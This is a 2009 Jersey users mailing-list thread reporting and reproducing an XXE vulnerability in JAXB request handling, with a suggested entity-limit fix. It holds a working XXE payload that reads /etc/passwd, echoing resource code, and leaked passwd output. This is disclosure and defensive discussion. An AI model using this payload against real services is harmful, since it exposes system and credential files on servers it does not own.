Sorry, wrong file was attached. Here's the correct one.
On Tue, Jul 7, 2009 at 11:16 AM, Tim McCune <tim_at_mccune.name> wrote:
> Even simpler to demonstrate, I've simply patched the "jaxb" example from
> the jersey-samples project with a new test case that demonstrates the
> vulnerability. I'm attaching the diff so you can patch the sample project
> and see the result for yourself.
>
> Apply the patch, run "mvn install" on the jaxb example project, and examine
> the test failure in
> target/surefire-reports/com.sun.jersey.samples.jaxb.MainTest.txt. You'll
> see something like this (on a Unix system):
>
> Tests run: 9, Failures: 1, Errors: 0, Skipped: 0, Time elapsed: 9.058 sec
> <<< FAILURE!
> testXXEVulnerability(com.sun.jersey.samples.jaxb.MainTest) Time elapsed:
> 0.598 sec <<< FAILURE!
> java.lang.AssertionError: XXE Attack succeeded: <?xml version="1.0"
> encoding="UTF-8"
> standalone="yes"?><jaxbXmlRootElement><value>root:x:0:0:root:/root:/bin/bash
> daemon:x:1:1:daemon:/usr/sbin:/bin/sh
> bin:x:2:2:bin:/bin:/bin/sh
> ...
>
>
> On Mon, Jul 6, 2009 at 1:25 PM, Tim McCune <tim_at_mccune.name> wrote:
>
>> @Path("/")
>> public class MovieResource
>> ...
>> @POST
>> @Path("user/{id}/favoriteMovies")
>> @Consumes({"application/xml", "application/json"})
>> public FavoriteMovie addFavoriteMovie(@PathParam("id") Long id,
>> FavoriteMovie movie) {
>> return movie;
>> }
>> }
>>
>> @XmlRootElement
>> public class FavoriteMovie {
>> private String _title;
>> public String getTitle() {
>> return _title;
>> }
>> public void setTitle(String title) {
>> _title = title;
>> }
>> }
>>
>> If I POST the following XML:
>> <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
>> <favoriteMovie><title>&xxe;</title></favoriteMovie>
>>
>> I get back:
>> <favoriteMovie>
>> <title>root:x:0:0:root:/root:/bin/bash
>> daemon:x:1:1:daemon:/usr/sbin:/bin/sh
>> ...
>> </title>
>> </favoriteMovie>
>>
>> Adding a
>> System.setProperty("entityExpansionLimit", "0");
>> fixes the problem, and causes this exception instead:
>> org.xml.sax.SAXParseException: The parser has encountered more than "0"
>> entity expansions in this document; this is the limit imposed by the
>> application.
>>
>>
>> On Mon, Jul 6, 2009 at 1:01 PM, Guba, Nicolai <nguba_at_bioware.com> wrote:
>>
>>> I could not reproduce it. The JAXB serializer (correctly) identified
>>> this as an invalid request.
>>>
>>>
>>>
>>> Maybe it works with resources that are processing form parameters? It
>>> may be helpful to see the code snipped of the resource you are accessing.
>>>
>>>
>>>
>>>
>>>
>>> --
>>>
>>> =NPG=
>>>
>>> *From:* ksuwildcat_at_gmail.com [mailto:ksuwildcat_at_gmail.com] *On Behalf Of
>>> *Tim McCune
>>> *Sent:* Monday, July 06, 2009 1:04 PM
>>> *To:* users_at_jersey.dev.java.net
>>> *Subject:* [Jersey] Jersey vulnerable to XXE attack?
>>>
>>>
>>>
>>> http://www.securiteam.com/securitynews/6D0100A5PU.html
>>>
>>> Just tried this attack against a simple web service built on top of
>>> Jersey, and it seems to have succeeded.
>>>
>>> <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
>>> <foo><bar>&xxe;</bar></foo>
>>>
>>> If I POST that to a web service built on Jersey, and have my resource
>>> just return the parameter that was passed into it, I can see the contents of
>>> /etc/passwd.
>>>
>>> Can anyone confirm that this vulnerability exists, and if so, advise on
>>> the best way to protect against it?
>>>
>>
>>
>
- application/octet-stream attachment: diff